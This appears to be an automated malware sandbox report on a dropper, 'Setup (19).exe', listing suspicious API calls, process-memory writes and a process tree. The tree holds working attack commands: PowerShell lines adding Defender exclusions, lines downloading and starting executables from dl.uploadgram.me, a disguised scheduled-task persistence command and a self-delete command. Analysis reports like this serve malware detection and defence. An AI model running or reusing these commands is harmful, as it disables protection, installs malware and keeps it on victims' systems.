Token: SeSystemtimePrivilege	4428	MicrosoftEdgeCP.exe
Token: SeProfSingleProcessPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeIncBasePriorityPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeCreatePagefilePrivilege	4428	MicrosoftEdgeCP.exe
Token: SeBackupPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeRestorePrivilege	4428	MicrosoftEdgeCP.exe
Token: SeShutdownPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeSystemEnvironmentPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeRemoteShutdownPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeUndockPrivilege	4428	MicrosoftEdgeCP.exe
Token: SeManageVolumePrivilege	4428	MicrosoftEdgeCP.exe
Token: 33	4428	MicrosoftEdgeCP.exe
Token: 34	4428	MicrosoftEdgeCP.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

DvMwGNgUky7bXWwCd2_zhu5C.tmpCleaner Installation.exeInlog.tmpWEATHER Manager.tmpVPN.tmpSetup.exeSetup.tmpSetup.tmpeHGLHEnRYqK4VhmYDOUgPfia.tmpultramediaburner.tmpEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.com

pid	process
4372	DvMwGNgUky7bXWwCd2_zhu5C.tmp
3016
3016
6008	Cleaner Installation.exe
3016
3016
5280	Inlog.tmp
5540	WEATHER Manager.tmp
5616	VPN.tmp
7324	Setup.exe
7664	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
8052	Setup.tmp
7492	eHGLHEnRYqK4VhmYDOUgPfia.tmp
7852	ultramediaburner.tmp
5936	Esplorarne.exe.com
3016
3016
5936	Esplorarne.exe.com
5936	Esplorarne.exe.com
5936	Esplorarne.exe.com
5580	Esplorarne.exe.com
5580	Esplorarne.exe.com
5580	Esplorarne.exe.com
2776	Esplorarne.exe.com
3016
3016
2776	Esplorarne.exe.com
2776	Esplorarne.exe.com
2776	Esplorarne.exe.com
3016
3016

Suspicious use of SendNotifyMessage 62 IoCs

Processes:

Esplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comMsiExec.exeEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comEsplorarne.exe.comWeather.exeEsplorarne.exe.comEsplorarne.exe.comrundll32.exeEsplorarne.exe.comConhost.exeEsplorarne.exe.comEsplorarne.exe.compowershell.exeEsplorarne.exe.com

pid	process
5936	Esplorarne.exe.com
5936	Esplorarne.exe.com
5936	Esplorarne.exe.com
5936	Esplorarne.exe.com
5580	Esplorarne.exe.com
5580	Esplorarne.exe.com
5580	Esplorarne.exe.com
2776	Esplorarne.exe.com
2776	Esplorarne.exe.com
2776	Esplorarne.exe.com
2776	Esplorarne.exe.com
6312	MsiExec.exe
6312	MsiExec.exe
6312	MsiExec.exe
7352	Esplorarne.exe.com
7352	Esplorarne.exe.com
7352	Esplorarne.exe.com
8224	Esplorarne.exe.com
8224	Esplorarne.exe.com
8224	Esplorarne.exe.com
8224	Esplorarne.exe.com
8896	Esplorarne.exe.com
8896	Esplorarne.exe.com
8896	Esplorarne.exe.com
8896	Esplorarne.exe.com
8288	Esplorarne.exe.com
8288	Esplorarne.exe.com
8288	Esplorarne.exe.com
8256	Esplorarne.exe.com
8256	Esplorarne.exe.com
8256	Esplorarne.exe.com
7520	Weather.exe
7520	Weather.exe
7520	Weather.exe
7520	Weather.exe
8380	Esplorarne.exe.com
8380	Esplorarne.exe.com
8380	Esplorarne.exe.com
8668	Esplorarne.exe.com
8668	Esplorarne.exe.com
8668	Esplorarne.exe.com
6452	rundll32.exe
6452	rundll32.exe
6452	rundll32.exe
7888	Esplorarne.exe.com
7888	Esplorarne.exe.com
7888	Esplorarne.exe.com
8544	Conhost.exe
8544	Conhost.exe
8544	Conhost.exe
7900	Esplorarne.exe.com
7900	Esplorarne.exe.com
7900	Esplorarne.exe.com
8012	Esplorarne.exe.com
8012	Esplorarne.exe.com
8012	Esplorarne.exe.com
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
7764	Esplorarne.exe.com
7764	Esplorarne.exe.com
7764	Esplorarne.exe.com

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.execmd.exeMaskVPNUpdate.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
3016
6788	MicrosoftEdge.exe
8948	MicrosoftEdgeCP.exe
8892	cmd.exe
8948	MicrosoftEdgeCP.exe
5176	MaskVPNUpdate.exe
5204	MicrosoftEdge.exe
2416	MicrosoftEdgeCP.exe
2416	MicrosoftEdgeCP.exe
6404	MicrosoftEdge.exe
4644	MicrosoftEdgeCP.exe
4644	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (19).exeMCy69zYoC6A83qNV7PWC49cY.exeIvXEuwW59N_cXWlDbgjIyNx7.exegdCjIZ3vQLrTFWKdOezjL1wn.exe

description	pid	process	target process
PID 3128 wrote to memory of 2852	3128	Setup (19).exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 3128 wrote to memory of 2852	3128	Setup (19).exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 3128 wrote to memory of 2852	3128	Setup (19).exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 3128 wrote to memory of 1184	3128	Setup (19).exe	Jehn52WtbMKZ9kxobh4J4A03.exe
PID 3128 wrote to memory of 1184	3128	Setup (19).exe	Jehn52WtbMKZ9kxobh4J4A03.exe
PID 3128 wrote to memory of 1184	3128	Setup (19).exe	Jehn52WtbMKZ9kxobh4J4A03.exe
PID 3128 wrote to memory of 2152	3128	Setup (19).exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 3128 wrote to memory of 2152	3128	Setup (19).exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 3128 wrote to memory of 2152	3128	Setup (19).exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 3128 wrote to memory of 2264	3128	Setup (19).exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 3128 wrote to memory of 2264	3128	Setup (19).exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 3128 wrote to memory of 2264	3128	Setup (19).exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 3128 wrote to memory of 4052	3128	Setup (19).exe	uwtBY5_fgfWhsQUfzRGn9ts8.exe
PID 3128 wrote to memory of 4052	3128	Setup (19).exe	uwtBY5_fgfWhsQUfzRGn9ts8.exe
PID 3128 wrote to memory of 4052	3128	Setup (19).exe	uwtBY5_fgfWhsQUfzRGn9ts8.exe
PID 3128 wrote to memory of 3336	3128	Setup (19).exe	WgAQMBbuvnZa4Uim1cKe4vXj.exe
PID 3128 wrote to memory of 3336	3128	Setup (19).exe	WgAQMBbuvnZa4Uim1cKe4vXj.exe
PID 3128 wrote to memory of 3336	3128	Setup (19).exe	WgAQMBbuvnZa4Uim1cKe4vXj.exe
PID 3128 wrote to memory of 4044	3128	Setup (19).exe	4g9oUp8jAFefeykFTkbWSBy4.exe
PID 3128 wrote to memory of 4044	3128	Setup (19).exe	4g9oUp8jAFefeykFTkbWSBy4.exe
PID 3128 wrote to memory of 3676	3128	Setup (19).exe	tfmFgK9w71TpTpJqhUlQRQle.exe
PID 3128 wrote to memory of 3676	3128	Setup (19).exe	tfmFgK9w71TpTpJqhUlQRQle.exe
PID 3128 wrote to memory of 3676	3128	Setup (19).exe	tfmFgK9w71TpTpJqhUlQRQle.exe
PID 3128 wrote to memory of 3820	3128	Setup (19).exe	H_GAN4lymZYNIe2SYb1o6PjL.exe
PID 3128 wrote to memory of 3820	3128	Setup (19).exe	H_GAN4lymZYNIe2SYb1o6PjL.exe
PID 3128 wrote to memory of 3820	3128	Setup (19).exe	H_GAN4lymZYNIe2SYb1o6PjL.exe
PID 3128 wrote to memory of 2136	3128	Setup (19).exe	0NKIqxJZOxkSqcoqQk5gff41.exe
PID 3128 wrote to memory of 2136	3128	Setup (19).exe	0NKIqxJZOxkSqcoqQk5gff41.exe
PID 3128 wrote to memory of 2136	3128	Setup (19).exe	0NKIqxJZOxkSqcoqQk5gff41.exe
PID 3128 wrote to memory of 2160	3128	Setup (19).exe	Bl4aeKqISbgmfj5TPTrnlG3E.exe
PID 3128 wrote to memory of 2160	3128	Setup (19).exe	Bl4aeKqISbgmfj5TPTrnlG3E.exe
PID 3128 wrote to memory of 2160	3128	Setup (19).exe	Bl4aeKqISbgmfj5TPTrnlG3E.exe
PID 3128 wrote to memory of 4028	3128	Setup (19).exe	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
PID 3128 wrote to memory of 4028	3128	Setup (19).exe	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
PID 3128 wrote to memory of 4028	3128	Setup (19).exe	oYJ4oarMVlCEKSuYDbZ6GPPw.exe
PID 3128 wrote to memory of 3492	3128	Setup (19).exe	9V6mnXHdynq1s7PpT244URZa.exe
PID 3128 wrote to memory of 3492	3128	Setup (19).exe	9V6mnXHdynq1s7PpT244URZa.exe
PID 3128 wrote to memory of 3492	3128	Setup (19).exe	9V6mnXHdynq1s7PpT244URZa.exe
PID 3128 wrote to memory of 2624	3128	Setup (19).exe	qhRWdCBRrOEeIDbo7QDZo256.exe
PID 3128 wrote to memory of 2624	3128	Setup (19).exe	qhRWdCBRrOEeIDbo7QDZo256.exe
PID 3128 wrote to memory of 508	3128	Setup (19).exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
PID 3128 wrote to memory of 508	3128	Setup (19).exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
PID 3128 wrote to memory of 508	3128	Setup (19).exe	Ls6HCRy7CjYIm6XRO_DMyU5M.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2852 wrote to memory of 4388	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2852 wrote to memory of 4388	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2852 wrote to memory of 4388	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2152 wrote to memory of 4396	2152	gdCjIZ3vQLrTFWKdOezjL1wn.exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 2152 wrote to memory of 4396	2152	gdCjIZ3vQLrTFWKdOezjL1wn.exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 2152 wrote to memory of 4396	2152	gdCjIZ3vQLrTFWKdOezjL1wn.exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe
PID 3128 wrote to memory of 4492	3128	Setup (19).exe	MWJd3mPPIlWyLa2RpIzVqQrH.exe
PID 3128 wrote to memory of 4492	3128	Setup (19).exe	MWJd3mPPIlWyLa2RpIzVqQrH.exe
PID 3128 wrote to memory of 4492	3128	Setup (19).exe	MWJd3mPPIlWyLa2RpIzVqQrH.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2264 wrote to memory of 4380	2264	MCy69zYoC6A83qNV7PWC49cY.exe	MCy69zYoC6A83qNV7PWC49cY.exe
PID 2852 wrote to memory of 4564	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2852 wrote to memory of 4564	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2852 wrote to memory of 4564	2852	IvXEuwW59N_cXWlDbgjIyNx7.exe	IvXEuwW59N_cXWlDbgjIyNx7.exe
PID 2152 wrote to memory of 4396	2152	gdCjIZ3vQLrTFWKdOezjL1wn.exe	gdCjIZ3vQLrTFWKdOezjL1wn.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1232

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:788

C:\Users\Admin\AppData\Roaming\cfsafjc
C:\Users\Admin\AppData\Roaming\cfsafjc
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6596

C:\Users\Admin\AppData\Roaming\cfsafjc
C:\Users\Admin\AppData\Roaming\cfsafjc
2⤵
- Suspicious behavior: MapViewOfSection
PID:7324

C:\Users\Admin\AppData\Roaming\cfsafjc
C:\Users\Admin\AppData\Roaming\cfsafjc
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2764

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1004

C:\Users\Admin\AppData\Local\Temp\Setup (19).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (19).exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3128

C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
"C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe"
2⤵
- Executes dropped EXE
PID:3676

C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
C:\Users\Admin\Documents\tfmFgK9w71TpTpJqhUlQRQle.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe
"C:\Users\Admin\Documents\uwtBY5_fgfWhsQUfzRGn9ts8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
"C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2264

C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
C:\Users\Admin\Documents\MCy69zYoC6A83qNV7PWC49cY.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4380

C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe
"C:\Users\Admin\Documents\WgAQMBbuvnZa4Uim1cKe4vXj.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3336

C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe
"C:\Users\Admin\Documents\4g9oUp8jAFefeykFTkbWSBy4.exe"
2⤵
- Executes dropped EXE
PID:4044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
3⤵
PID:4824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
4⤵
PID:4428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
4⤵
PID:7116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
4⤵
PID:6724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
4⤵
PID:7876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
4⤵
PID:9132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
4⤵
- Blocklisted process makes network request
PID:5372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
4⤵
PID:9172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
4⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\installer.exe
"C:\Users\Admin\AppData\Local\Temp\installer.exe"
5⤵
PID:1868

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
PID:388

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
PID:188

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
PID:1328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
PID:8972

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
6⤵
PID:8816

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:6276

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
7⤵
PID:4932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
8⤵
PID:5624

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
9⤵
- Creates scheduled task(s)
PID:6944

C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
8⤵
PID:6860

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
9⤵
PID:9060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
10⤵
PID:8508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
10⤵
PID:8828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
10⤵
PID:8636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
10⤵
PID:8840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
9⤵
PID:9156

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
- Suspicious use of SendNotifyMessage
PID:8544

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
10⤵
- Drops file in System32 directory
PID:7556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
11⤵
- Drops file in System32 directory
PID:4932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
PID:5624

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
12⤵
- Creates scheduled task(s)
PID:7744

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
11⤵
PID:7460

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
11⤵
PID:4156

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
12⤵
PID:4836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
8⤵
PID:6548

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:9168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
4⤵
PID:7976

C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
5⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
PID:8324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
4⤵
PID:8504

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
5⤵
- Suspicious use of SetThreadContext
PID:8144

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"{path}"
6⤵
PID:1784

C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
"C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2852

C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
3⤵
- Executes dropped EXE
PID:4388

C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
C:\Users\Admin\Documents\IvXEuwW59N_cXWlDbgjIyNx7.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
"C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2152

C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4396

C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe
"C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe
"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"
2⤵
- Executes dropped EXE
PID:2160

C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe
"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe" -q
3⤵
PID:5032

C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe
"C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2136

C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe
"C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3820

C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe
"C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe
"C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2624

C:\Users\Admin\AppData\Roaming\4726380.exe
"C:\Users\Admin\AppData\Roaming\4726380.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3572

C:\Users\Admin\AppData\Roaming\7300426.exe
"C:\Users\Admin\AppData\Roaming\7300426.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1996

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:4716

C:\Users\Admin\AppData\Roaming\2310645.exe
"C:\Users\Admin\AppData\Roaming\2310645.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4468

